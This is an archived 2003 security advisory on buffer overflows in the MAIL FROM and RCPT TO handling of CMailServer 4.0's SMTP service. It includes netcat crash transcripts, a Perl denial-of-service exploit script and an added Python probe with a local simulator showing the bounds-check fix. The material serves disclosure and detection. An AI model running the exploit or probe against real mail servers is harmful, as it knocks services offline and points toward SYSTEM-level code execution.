TUCoPS :: Windows Net Apps :: bt157.txt

CMailServer 4.0 Multiple Buffer Overflow Vulnerabilities





                    Multiple Buffer Overflow Vulnerabilities
                          Found in CMailServer 4.0
                         http://www.youngzsoft.com
                          Discovered by Dennis Rand
                             www.Infowarfare.dk
------------------------------------------------------------------------


-----[SUMMARY
CMailServer, a small and easy to administer email server and web
mail server software, can help you build your own email server for
Win NT/2000/XP. It enables you to send and receive email across the
Internet or within your LAN. ESMTP authentication, ASP form web
mail and multiple domain names are supported.

CMailServer offers an unlimited email users license at a reasonable
and affordable price compared to other email server software.
For small to medium sized companies, CMailServer will be an
economic and effective solution to handle their e-mail management
requirements. CMailServer also is a web mail server software and
provides full web mail service. The web mail is based on ASP.
You can customize your web mail interface freely. Give it a try
and find out how easy it is to build an email server and web mail
server for your own business.


The problem is a buffer overflow in the SMTP protocol handling of the
ESMTP CMailServer 4.0.2003.03.27 SMTP Service, causing the service to
shut down.
It is possible to overwrite the exception handler on the stack, allowing
a system compromise with code execution running as SYSTEM.


-----[AFFECTED SYSTEMS
Vulnerable systems:
 * ESMTP CMailServer 4.0.2003.03.27 SMTP Service

Immune systems:
 * ESMTP CMailServer 4.0.2003.03.30 SMTP Service

-----[SEVERITY
High -        An attacker is able to cause a DoS attack on the SMTP
              service. The exception handler on the stack can also be
              overwritten, allowing a system compromise with code
              execution running as SYSTEM.

-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The vulnerability is a buffer overflow in the ESMTP CMailServer
4.0.2003.03.27 SMTP Service.
When an attacker sends an overlong argument to the "MAIL FROM" or the
"RCPT TO" command, the buffer overflows. Because the overwritten data
reaches the exception handler on the stack, carefully crafted input
could execute arbitrary commands with SYSTEM privileges.

The following transcript demonstrates a sample exploitation of the=20
Vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<Connection closed>

The same Vulnerability is in the RCPT TO
nc warlab.dk 25
220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[Buffer size 2000 Bytes @warlab.dk]
<connection closed>
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] -----------------------------
#!/usr/bin/perl -w
##################
# ESMTP CMailServer 4.0.2003.03.27 SMTP Service DoS attack
#
# URL: http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip> [buffer length]
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP CMailServer, causing the service to shutdown.
# It is then where we can actually overwrite the exception handler on the
# stack, allowing a system compromise with code execution running as SYSTEM.
#
# I've censored some of the source code out. =)
#
# Solution:
# None at this time
#

use strict;
use IO::Socket;

my $target = shift() || "warlab.dk";
my $port   = 25;
# The buffer length is censored in the original advisory; take it from the
# command line, defaulting to the 2000 bytes that closed the connection in
# the transcript above.
my $length = shift() || 2000;
my $Buffer = "A" x $length;

my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto    => 'tcp'
                                 ) || die "could not connect: $!";

# The server greets with a 220 banner; anything else means it is not
# talking SMTP to us.
my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
my $resp = <$sock>;

# Overlong sender address: the vulnerable build dies here instead of
# answering with a 250.
print $sock "MAIL FROM: $Buffer\@$target\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
----------------------------- [Exploit Code] -----------------------------



-----[DETECTION
ESMTP CMailServer 4.0.2003.03.27 SMTP Service is vulnerable to the
above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, follow the above transcript: a vulnerable
build drops the connection as soon as it receives the overlong "MAIL FROM"
or "RCPT TO" argument, whereas an unaffected build keeps the session open
and answers the command.
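The check above is done by hand with netcat. The following script is an added example (not the advisory's code and not YoungZSoft's) that automates the same exchange for both verbs and classifies the result, and, so that it runs offline, includes a throw-away SMTP simulator with two modes: an unhardened mode that mimics the advisory's symptom (the connection dies once the argument exceeds a fixed-size buffer) and a hardened mode that shows the bounds check the fixed build needs, rejecting any reverse or forward path longer than the 256 octets RFC 5321 allows. The banners, the 2000-byte size and the "250 win2k-serv" reply are taken from the advisory; the simulator's 1024-byte buffer, the 501 reply text, the example.invalid domain and the use of localhost are assumptions, and the advisory does not say how the vendor actually fixed the bug.

```python
import socket
import threading

# Banners quoted from the advisory's transcript and AFFECTED SYSTEMS list.
BANNER_VULN = b"220 ESMTP CMailServer 4.0.2003.03.27 SMTP Service Ready\r\n"
BANNER_FIXED = b"220 ESMTP CMailServer 4.0.2003.03.30 SMTP Service Ready\r\n"
RFC5321_PATH_LIMIT = 256   # RFC 5321 4.5.3.1.3: max reverse/forward path, in octets
SIM_STACK_BUFFER = 1024    # assumed fixed-size buffer of the simulated vulnerable build


def recv_line(sock):
    """Read one CRLF-terminated line; return b'' if the peer closed first."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            return b""
        buf += chunk
    return buf


def probe(host, port, verb="MAIL FROM", size=2000, timeout=5.0):
    """Replay the advisory's transcript with an oversize address in VERB.

    'vulnerable' - the server closed the connection (the advisory's symptom)
    'rejected'   - it answered with a 5xx code (a bounds check is in place)
    'accepted'   - it answered 2xx (no crash at this size)
    'unknown'    - no 220 banner, or an unexpected reply
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        if not recv_line(s).startswith(b"220"):
            return "unknown"
        s.sendall(b"HELO probe\r\n")
        recv_line(s)
        if verb == "RCPT TO":                  # RCPT needs a valid MAIL first
            s.sendall(b"MAIL FROM:<probe@example.invalid>\r\n")
            recv_line(s)
        s.sendall(verb.encode() + b":<" + b"A" * size + b"@example.invalid>\r\n")
        try:
            reply = recv_line(s)
        except (ConnectionResetError, socket.timeout):
            return "vulnerable"
    if reply == b"":
        return "vulnerable"
    if reply.startswith(b"5"):
        return "rejected"
    if reply.startswith(b"2"):
        return "accepted"
    return "unknown"


def _session(conn, hardened):
    """One simulated session (constructed for this example).

    Unhardened: behaves like a fixed-size stack buffer filled without a length
    check; an argument longer than the buffer 'crashes' the service, which the
    client sees as a dropped connection.  Hardened: bounds the argument first.
    """
    with conn:
        conn.sendall(BANNER_FIXED if hardened else BANNER_VULN)
        while True:
            line = recv_line(conn).strip()
            if not line:
                return
            cmd = line.upper()
            if cmd.startswith((b"HELO", b"EHLO")):
                conn.sendall(b"250 win2k-serv\r\n")
            elif cmd.startswith((b"MAIL FROM:", b"RCPT TO:")):
                path = line.split(b":", 1)[1].strip()
                if hardened and len(path) > RFC5321_PATH_LIMIT:
                    conn.sendall(b"501 5.5.4 Path too long\r\n")
                elif not hardened and len(path) > SIM_STACK_BUFFER:
                    return                     # overflow: the service goes away
                else:
                    conn.sendall(b"250 Ok\r\n")
            elif cmd.startswith(b"QUIT"):
                conn.sendall(b"221 Bye\r\n")
                return
            else:
                conn.sendall(b"500 Unknown command\r\n")


def start_simulator(hardened):
    """Listen on an ephemeral localhost port in a daemon thread; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_session, args=(conn, hardened), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    for hardened in (False, True):
        port = start_simulator(hardened)
        for verb in ("MAIL FROM", "RCPT TO"):
            print(f"hardened={hardened!s:<5} {verb}: {probe('127.0.0.1', port, verb)}")
```

Against a real host, call `probe(host, 25, verb)` for both verbs; a dropped connection on either is the advisory's symptom, while a 5xx reply shows the server bounds the path before using it. The 2000-byte default is only what the advisory's transcript used; when checking a different build, also try sizes between 256 and 2000, since "accepted" at one size says nothing about larger ones.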


-----[WORK AROUNDS
Upgrade as soon as possible to ESMTP CMailServer 4.0.2003.03.30 SMTP
Service or later.
The other workaround is to disable the SMTP service, but that is not fun.

-----[VENDOR RESPONSE
Quoting YoungZSoft <yaoer@youngzsoft.com>:
I thank you very very much for your report.
We will fix this as soon as possible
Yaoer

-----[DISCLOSURE TIMELINE
24/04/2003 Found the Vulnerability, and made an analysis.
29/04/2003 Contacted Vendor at support@youngzsoft.net
30/04/2003 Received response from vendor with a fix to test
01/05/2003 New version tested negative for the vulnerabilities
10/05/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by Dennis Rand
<der@infowarfare.dk>.

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.




